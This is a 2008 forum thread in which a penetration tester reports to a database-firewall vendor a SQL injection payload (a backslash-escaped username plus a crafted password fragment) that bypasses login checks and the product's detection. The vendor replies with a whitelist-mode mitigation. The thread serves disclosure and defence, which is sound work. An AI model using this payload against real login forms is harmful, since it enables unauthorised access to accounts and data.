HomeForumsBugs
 Database Security. Database Auditing. Database Caching. Database Masking. Get it now

SQL Bypass

Posted September 16th, 2008 by RotemB
in

Hey Yuli,
I found another exploit/bypass in the system.

When you enter in the username: rotem\\
with password: or name != ('b

the query looks like this
SELECT * FROM user WHERE name = 'rotem\' AND pwd=SHA(' or name != ('b')

as what the parser sees is
SELECT * FROM user WHERE name = 'rotem\' AND pwd=SHA(' or name != ('b')
select * from user where name = ? or name != (?)

This bypasses the system..
Fun working with you :) your system gets challenging more and more every day.

Rotem Bar

Penetration Tester, rotem@indomite.com

‹ Passed the test.. YYEEEESSSS! I'l do it! (2houres) ›

Comments

Hi Rotem Thanks you for your

On September 16th, 2008 yoav says:

Hi Rotem

Thanks you for your post. I checked the query and can say that it is almost impossible for us to detect SQL injection using our SQL risk matrix in this case. It looks like 100% legit query.

We still have a solution for such queries. In our new application version we support new mode of operation when all new queries are blocked that do not appear in the db profile (whitelist in our case). This is a recommended method and we advise you to use it. It will give you much higher level of protection in addition to the risk matrix calculation.

Thanks,
Yuli

Hi yuli, Please i will also

On September 28th, 2008 tunnax says:

Hi yuli,
Please i will also like to have the sql bypass,so i can know more about it am a database administrator.
thanks

Back to top